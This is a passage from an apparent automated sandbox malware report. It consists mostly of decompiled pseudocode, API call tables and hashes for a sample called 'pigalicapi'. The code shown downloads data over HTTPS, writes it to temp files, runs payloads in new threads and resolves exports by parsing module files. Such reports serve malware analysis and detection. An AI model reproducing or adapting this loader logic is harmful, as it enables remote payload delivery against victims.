                                                                                                                                                                                                                                                                            						_v52 = _v632;
                                                                                                                                                                                                                                                                            						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
                                                                                                                                                                                                                                                                            							if( *_v52 != 0) {
                                                                                                                                                                                                                                                                            								E01177B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                            								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                            								 *(_v52 + 4) =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *_v52 = _v36;
                                                                                                                                                                                                                                                                            							 *(_v52 + 4) = _v44;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if( *_v52 != 0) {
                                                                                                                                                                                                                                                                            							 *(_v52 + 8) =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
                                                                                                                                                                                                                                                                            							_v56 = CreateThread(0, 0, E011777B0, _v52, 0, 0);
                                                                                                                                                                                                                                                                            							CloseHandle(_v56);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            						E01172510(_v40, 0x117e290);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                                                            0x01176dac
                                                                                                                                                                                                                                                                            0x01176db3
                                                                                                                                                                                                                                                                            0x0117723f
                                                                                                                                                                                                                                                                            0x01177244
                                                                                                                                                                                                                                                                            0x01177244
                                                                                                                                                                                                                                                                            0x01176dc9
                                                                                                                                                                                                                                                                            0x01176dd1
                                                                                                                                                                                                                                                                            0x01176ddc
                                                                                                                                                                                                                                                                            0x01176de5
                                                                                                                                                                                                                                                                            0x01176dee
                                                                                                                                                                                                                                                                            0x01176df7
                                                                                                                                                                                                                                                                            0x01176e00
                                                                                                                                                                                                                                                                            0x01176e09
                                                                                                                                                                                                                                                                            0x01176e15
                                                                                                                                                                                                                                                                            0x01177028
                                                                                                                                                                                                                                                                            0x01177039
                                                                                                                                                                                                                                                                            0x0117704a
                                                                                                                                                                                                                                                                            0x0117704f
                                                                                                                                                                                                                                                                            0x01177077
                                                                                                                                                                                                                                                                            0x01177099
                                                                                                                                                                                                                                                                            0x011770a6
                                                                                                                                                                                                                                                                            0x011770ac
                                                                                                                                                                                                                                                                            0x011770b6
                                                                                                                                                                                                                                                                            0x011770c6
                                                                                                                                                                                                                                                                            0x011770d5
                                                                                                                                                                                                                                                                            0x011771af
                                                                                                                                                                                                                                                                            0x011770db
                                                                                                                                                                                                                                                                            0x011770eb
                                                                                                                                                                                                                                                                            0x01177107
                                                                                                                                                                                                                                                                            0x01177114
                                                                                                                                                                                                                                                                            0x0117713d
                                                                                                                                                                                                                                                                            0x01177163
                                                                                                                                                                                                                                                                            0x0117716f
                                                                                                                                                                                                                                                                            0x0117716f
                                                                                                                                                                                                                                                                            0x01177183
                                                                                                                                                                                                                                                                            0x01177183
                                                                                                                                                                                                                                                                            0x01177189
                                                                                                                                                                                                                                                                            0x011771bc
                                                                                                                                                                                                                                                                            0x011771c9
                                                                                                                                                                                                                                                                            0x011771e0
                                                                                                                                                                                                                                                                            0x011771e5
                                                                                                                                                                                                                                                                            0x011771e8
                                                                                                                                                                                                                                                                            0x011771f5
                                                                                                                                                                                                                                                                            0x011771fe
                                                                                                                                                                                                                                                                            0x01177212
                                                                                                                                                                                                                                                                            0x01177217
                                                                                                                                                                                                                                                                            0x01177217
                                                                                                                                                                                                                                                                            0x01177223
                                                                                                                                                                                                                                                                            0x01177231
                                                                                                                                                                                                                                                                            0x01177236
                                                                                                                                                                                                                                                                            0x01177223
                                                                                                                                                                                                                                                                            0x011771f5
                                                                                                                                                                                                                                                                            0x011771c9
                                                                                                                                                                                                                                                                            0x01177239
                                                                                                                                                                                                                                                                            0x01177239
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01177239
                                                                                                                                                                                                                                                                            0x01176e1b
                                                                                                                                                                                                                                                                            0x01176e22
                                                                                                                                                                                                                                                                            0x01176e29
                                                                                                                                                                                                                                                                            0x01176e39
                                                                                                                                                                                                                                                                            0x01176eec
                                                                                                                                                                                                                                                                            0x01176ef1
                                                                                                                                                                                                                                                                            0x01176ef4
                                                                                                                                                                                                                                                                            0x01176e3f
                                                                                                                                                                                                                                                                            0x01176e4f
                                                                                                                                                                                                                                                                            0x01176e65
                                                                                                                                                                                                                                                                            0x01176e6c
                                                                                                                                                                                                                                                                            0x01176e8c
                                                                                                                                                                                                                                                                            0x01176e92
                                                                                                                                                                                                                                                                            0x01176e97
                                                                                                                                                                                                                                                                            0x01176e9a
                                                                                                                                                                                                                                                                            0x01176ea6
                                                                                                                                                                                                                                                                            0x01176ebb
                                                                                                                                                                                                                                                                            0x01176eca
                                                                                                                                                                                                                                                                            0x01176ecf
                                                                                                                                                                                                                                                                            0x01176ecf
                                                                                                                                                                                                                                                                            0x01176ea6
                                                                                                                                                                                                                                                                            0x01176edd
                                                                                                                                                                                                                                                                            0x01176edd
                                                                                                                                                                                                                                                                            0x01176ee3
                                                                                                                                                                                                                                                                            0x01176efb
                                                                                                                                                                                                                                                                            0x01177012
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176f01
                                                                                                                                                                                                                                                                            0x01176f08
                                                                                                                                                                                                                                                                            0x01176f1c
                                                                                                                                                                                                                                                                            0x01176f21
                                                                                                                                                                                                                                                                            0x01176f21
                                                                                                                                                                                                                                                                            0x01176f2d
                                                                                                                                                                                                                                                                            0x01176f35
                                                                                                                                                                                                                                                                            0x01176f3a
                                                                                                                                                                                                                                                                            0x01176f3d
                                                                                                                                                                                                                                                                            0x01176f49
                                                                                                                                                                                                                                                                            0x01176f55
                                                                                                                                                                                                                                                                            0x01176f83
                                                                                                                                                                                                                                                                            0x01176f8b
                                                                                                                                                                                                                                                                            0x01176fa1
                                                                                                                                                                                                                                                                            0x01176fa6
                                                                                                                                                                                                                                                                            0x01176fb2
                                                                                                                                                                                                                                                                            0x01176fb2
                                                                                                                                                                                                                                                                            0x01176f57
                                                                                                                                                                                                                                                                            0x01176f5d
                                                                                                                                                                                                                                                                            0x01176f65
                                                                                                                                                                                                                                                                            0x01176f65
                                                                                                                                                                                                                                                                            0x01176fbb
                                                                                                                                                                                                                                                                            0x01176fc6
                                                                                                                                                                                                                                                                            0x01176fcf
                                                                                                                                                                                                                                                                            0x01176fe9
                                                                                                                                                                                                                                                                            0x01176ff0
                                                                                                                                                                                                                                                                            0x01176ff0
                                                                                                                                                                                                                                                                            0x01176fbb
                                                                                                                                                                                                                                                                            0x01176fff
                                                                                                                                                                                                                                                                            0x0117700a
                                                                                                                                                                                                                                                                            0x0117700f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176fff

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?), ref: 01176DC9
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 01176DD1
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 01176E5F
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 01176EB5
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 01176EDD
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 01176F7A
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 01176FE3
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01176FF0
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 01177028
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 01177059
                                                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 01177077
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 01177093
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 01177101
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0117715D
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 01177183
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 011771A9
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 011771BC
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 01177239
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                                            • String ID: TEMP
                                                                                                                                                                                                                                                                            • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                                            • Opcode ID: 9fb92be8959cfe2f75870b304f087b02139ab11b3259088a33e25f7758da5784
                                                                                                                                                                                                                                                                            • Instruction ID: 6c5cbe499fbaba5ac711749f53ba202d204ba38c61986e19b2c6ccc9e314844a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fb92be8959cfe2f75870b304f087b02139ab11b3259088a33e25f7758da5784
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74F10F75A00209EFDB18DF94D999F9DB7B5FB48304F248198E509AB390D771AE81CF90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01172900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				CHAR* _v28;
                                                                                                                                                                                                                                                                            				char _v292;
                                                                                                                                                                                                                                                                            				void _v296;
                                                                                                                                                                                                                                                                            				void* _v300;
                                                                                                                                                                                                                                                                            				long _v304;
                                                                                                                                                                                                                                                                            				long _v308;
                                                                                                                                                                                                                                                                            				char* _t54;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                            					_t54 = E0117E004; // 0x117c398
                                                                                                                                                                                                                                                                            					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x117c3d2, 0x117c3d1, 3, 0, 0);
                                                                                                                                                                                                                                                                            						if(_v16 != 0) {
                                                                                                                                                                                                                                                                            							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
                                                                                                                                                                                                                                                                            							if(_v20 != 0) {
                                                                                                                                                                                                                                                                            								wsprintfA( &_v292, "https://%s", _a4);
                                                                                                                                                                                                                                                                            								_v28 = "Accept: */*";
                                                                                                                                                                                                                                                                            								_v24 = 4;
                                                                                                                                                                                                                                                                            								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
                                                                                                                                                                                                                                                                            								_v296 = _v296 | 0x0000b180;
                                                                                                                                                                                                                                                                            								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
                                                                                                                                                                                                                                                                            								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
                                                                                                                                                                                                                                                                            									_v308 = GetLastError();
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v300 = 0;
                                                                                                                                                                                                                                                                            									while(_v300 < _a12) {
                                                                                                                                                                                                                                                                            										_v304 = 0;
                                                                                                                                                                                                                                                                            										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
                                                                                                                                                                                                                                                                            										if(_v304 != 0) {
                                                                                                                                                                                                                                                                            											_v300 = _v300 + _v304;
                                                                                                                                                                                                                                                                            											 *(_a8 + _v300) = 0;
                                                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v8 = _v300;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								InternetCloseHandle(_v20);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						InternetCloseHandle(_v12);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x01172909
                                                                                                                                                                                                                                                                            0x01172914
                                                                                                                                                                                                                                                                            0x01172936
                                                                                                                                                                                                                                                                            0x01172942
                                                                                                                                                                                                                                                                            0x01172949
                                                                                                                                                                                                                                                                            0x01172972
                                                                                                                                                                                                                                                                            0x01172979
                                                                                                                                                                                                                                                                            0x011729a3
                                                                                                                                                                                                                                                                            0x011729aa
                                                                                                                                                                                                                                                                            0x011729c0
                                                                                                                                                                                                                                                                            0x011729c9
                                                                                                                                                                                                                                                                            0x011729d0
                                                                                                                                                                                                                                                                            0x011729e8
                                                                                                                                                                                                                                                                            0x011729f9
                                                                                                                                                                                                                                                                            0x01172a0e
                                                                                                                                                                                                                                                                            0x01172a33
                                                                                                                                                                                                                                                                            0x01172ab5
                                                                                                                                                                                                                                                                            0x01172a35
                                                                                                                                                                                                                                                                            0x01172a35
                                                                                                                                                                                                                                                                            0x01172a3f
                                                                                                                                                                                                                                                                            0x01172a4a
                                                                                                                                                                                                                                                                            0x01172a73
                                                                                                                                                                                                                                                                            0x01172a80
                                                                                                                                                                                                                                                                            0x01172a90
                                                                                                                                                                                                                                                                            0x01172a9f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172a82
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172a80
                                                                                                                                                                                                                                                                            0x01172aaa
                                                                                                                                                                                                                                                                            0x01172aaa
                                                                                                                                                                                                                                                                            0x01172acb
                                                                                                                                                                                                                                                                            0x01172acb
                                                                                                                                                                                                                                                                            0x01172ad5
                                                                                                                                                                                                                                                                            0x01172ad5
                                                                                                                                                                                                                                                                            0x01172adf
                                                                                                                                                                                                                                                                            0x01172adf
                                                                                                                                                                                                                                                                            0x01172949
                                                                                                                                                                                                                                                                            0x01172aeb

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(0117C398,00000001,00000000,00000000,00000000), ref: 0117293C
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,000001BB,0117C3D2,0117C3D1,00000003,00000000,00000000), ref: 0117296C
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,0117C3D8,1.1,00000000,00000000,80800000,00000000), ref: 0117299D
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 011729C0
                                                                                                                                                                                                                                                                            • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 011729E8
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 01172A0E
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(Accept: */*,00000000,00000000), ref: 01172A1C
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,Accept: */*,00000000), ref: 01172A2B
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 01172A73
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01172AAF
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 01172ACB
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 01172AD5
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 01172ADF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                                            • String ID: 1.1$Accept: */*$GET$https://%s
                                                                                                                                                                                                                                                                            • API String ID: 2082764430-47765423
                                                                                                                                                                                                                                                                            • Opcode ID: 3e0b96c0254aaaf4bddeb1064825bafa9c2ef45df2a2ee4657c64150ebaa25a9
                                                                                                                                                                                                                                                                            • Instruction ID: b44b5479aa752f2154882d65fb81f8241c9e2ad95ebba86fb4d1209dbd66b4e7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e0b96c0254aaaf4bddeb1064825bafa9c2ef45df2a2ee4657c64150ebaa25a9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F512C71940209EFDB28DF94DC89BEEB7B4AB48700F104598F615A7384C7B09AC1CF90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E011735E0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _v12;
                                                                                                                                                                                                                                                                            				char _v532;
                                                                                                                                                                                                                                                                            				void* _v536;
                                                                                                                                                                                                                                                                            				long _v540;
                                                                                                                                                                                                                                                                            				void* _v544;
                                                                                                                                                                                                                                                                            				long _v548;
                                                                                                                                                                                                                                                                            				CHAR* _v552;
                                                                                                                                                                                                                                                                            				void* _v556;
                                                                                                                                                                                                                                                                            				int _v560;
                                                                                                                                                                                                                                                                            				char _v820;
                                                                                                                                                                                                                                                                            				CHAR* _v824;
                                                                                                                                                                                                                                                                            				char _v1084;
                                                                                                                                                                                                                                                                            				signed char _v1085;
                                                                                                                                                                                                                                                                            				long _v1092;
                                                                                                                                                                                                                                                                            				intOrPtr _v1096;
                                                                                                                                                                                                                                                                            				long _t124;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_v12 = GetModuleHandleA(_a4);
                                                                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                                                                            					E01172E50( &_v532,  &_v532, 0, 0x208);
                                                                                                                                                                                                                                                                            					if(GetModuleFileNameA(_v12,  &_v532, 0x207) > 0) {
                                                                                                                                                                                                                                                                            						_v536 = CreateFileA( &_v532, 0x80000000, 7, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                            						if(_v536 != 0xffffffff) {
                                                                                                                                                                                                                                                                            							_v540 = GetFileSize(_v536, 0);
                                                                                                                                                                                                                                                                            							if(_v540 > 0) {
                                                                                                                                                                                                                                                                            								_v544 = VirtualAlloc(0, _v540, 0x3000, 4);
                                                                                                                                                                                                                                                                            								_t155 = _v544;
                                                                                                                                                                                                                                                                            								if(_v544 != 0) {
                                                                                                                                                                                                                                                                            									_v548 = 0;
                                                                                                                                                                                                                                                                            									ReadFile(_v536, _v544, _v540,  &_v548, 0);
                                                                                                                                                                                                                                                                            									_v556 = E01173370(_v536, _t155, _v544, _v540);
                                                                                                                                                                                                                                                                            									_v552 = E01173580(_a8, _v556, _a8);
                                                                                                                                                                                                                                                                            									_v560 = lstrlenA(_v552);
                                                                                                                                                                                                                                                                            									if(_v560 > 2 && _v560 < 0x100) {
                                                                                                                                                                                                                                                                            										_v824 = _v552;
                                                                                                                                                                                                                                                                            										_v1085 = 0;
                                                                                                                                                                                                                                                                            										E01172E50(_v552,  &_v820, 0, 0x100);
                                                                                                                                                                                                                                                                            										E01172E50(_v552,  &_v1084, 0, 0x100);
                                                                                                                                                                                                                                                                            										_v1092 = 0;
                                                                                                                                                                                                                                                                            										while(_v1092 < _v560) {
                                                                                                                                                                                                                                                                            											if(_v824[_v1092] < 0x20 || _v824[_v1092] > 0x7e) {
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												if(_v824[_v1092] != 0x2e) {
                                                                                                                                                                                                                                                                            													_t124 = _v1092 + 1;
                                                                                                                                                                                                                                                                            													__eflags = _t124;
                                                                                                                                                                                                                                                                            													_v1092 = _t124;
                                                                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													lstrcpynA( &_v820, _v824, _v1092 + 1);
                                                                                                                                                                                                                                                                            													lstrcatA( &_v820, ".dll");
                                                                                                                                                                                                                                                                            													lstrcpyA( &_v1084,  &(_v824[_v1092 + 1]));
                                                                                                                                                                                                                                                                            													_v1085 = 1;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										if((_v1085 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            											_v8 = E011735E0( &_v820,  &_v1084);
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									if(_v8 == 0 && _v552 != 0) {
                                                                                                                                                                                                                                                                            										_v1096 = _v552 - _v556;
                                                                                                                                                                                                                                                                            										_v8 = _v12 + _v1096;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									VirtualFree(_v556, 0, 0x8000);
                                                                                                                                                                                                                                                                            									VirtualFree(_v544, 0, 0x8000);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							CloseHandle(_v536);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x011735e9
                                                                                                                                                                                                                                                                            0x011735fa
                                                                                                                                                                                                                                                                            0x01173601
                                                                                                                                                                                                                                                                            0x01173615
                                                                                                                                                                                                                                                                            0x01173635
                                                                                                                                                                                                                                                                            0x01173657
                                                                                                                                                                                                                                                                            0x01173664
                                                                                                                                                                                                                                                                            0x01173679
                                                                                                                                                                                                                                                                            0x01173686
                                                                                                                                                                                                                                                                            0x011736a2
                                                                                                                                                                                                                                                                            0x011736a8
                                                                                                                                                                                                                                                                            0x011736af
                                                                                                                                                                                                                                                                            0x011736b5
                                                                                                                                                                                                                                                                            0x011736dd
                                                                                                                                                                                                                                                                            0x011736f9
                                                                                                                                                                                                                                                                            0x01173712
                                                                                                                                                                                                                                                                            0x01173725
                                                                                                                                                                                                                                                                            0x01173732
                                                                                                                                                                                                                                                                            0x0117374e
                                                                                                                                                                                                                                                                            0x01173754
                                                                                                                                                                                                                                                                            0x01173769
                                                                                                                                                                                                                                                                            0x0117377f
                                                                                                                                                                                                                                                                            0x01173787
                                                                                                                                                                                                                                                                            0x011737a2
                                                                                                                                                                                                                                                                            0x011737c6
                                                                                                                                                                                                                                                                            0x011737e0
                                                                                                                                                                                                                                                                            0x011737f2
                                                                                                                                                                                                                                                                            0x01173799
                                                                                                                                                                                                                                                                            0x01173799
                                                                                                                                                                                                                                                                            0x0117379c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011737f4
                                                                                                                                                                                                                                                                            0x0117380c
                                                                                                                                                                                                                                                                            0x0117381e
                                                                                                                                                                                                                                                                            0x0117383c
                                                                                                                                                                                                                                                                            0x01173842
                                                                                                                                                                                                                                                                            0x01173842
                                                                                                                                                                                                                                                                            0x011737f2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011737c6
                                                                                                                                                                                                                                                                            0x0117385d
                                                                                                                                                                                                                                                                            0x01173875
                                                                                                                                                                                                                                                                            0x01173875
                                                                                                                                                                                                                                                                            0x0117385d
                                                                                                                                                                                                                                                                            0x0117387c
                                                                                                                                                                                                                                                                            0x01173893
                                                                                                                                                                                                                                                                            0x011738a2
                                                                                                                                                                                                                                                                            0x011738a2
                                                                                                                                                                                                                                                                            0x011738b3
                                                                                                                                                                                                                                                                            0x011738c7
                                                                                                                                                                                                                                                                            0x011738c7
                                                                                                                                                                                                                                                                            0x011736af
                                                                                                                                                                                                                                                                            0x011738d4
                                                                                                                                                                                                                                                                            0x011738d4
                                                                                                                                                                                                                                                                            0x01173664
                                                                                                                                                                                                                                                                            0x01173635
                                                                                                                                                                                                                                                                            0x011738e0

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?), ref: 011735F4
                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 0117362D
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 01173651
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 01173673
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0117369C
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 011736DD
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0117371F
                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,-00000001), ref: 0117380C
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,.dll), ref: 0117381E
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0117383C
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 011738B3
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 011738C7
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 011738D4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                                            • String ID: .dll
                                                                                                                                                                                                                                                                            • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                                            • Opcode ID: 4f6ae8635b9031151e48ca7d65e7c34e435a93487bb3317b73e7aa122a9e8182
                                                                                                                                                                                                                                                                            • Instruction ID: 1521a142823ccb5ed662f3f0ca174f7f0179e51a2e6b2a5ed34256536500ee35
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f6ae8635b9031151e48ca7d65e7c34e435a93487bb3317b73e7aa122a9e8182
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16818CB5D50229EBDB28DBA4DC88BD9B7B5BB48304F1042D8E219A7380D7709BC4CF95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                                                            			E01172AF0(char* _a4, intOrPtr _a8, long _a12, signed char _a16) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				char _v84;
                                                                                                                                                                                                                                                                            				void* _v88;
                                                                                                                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                                                                                                                            				long _v96;
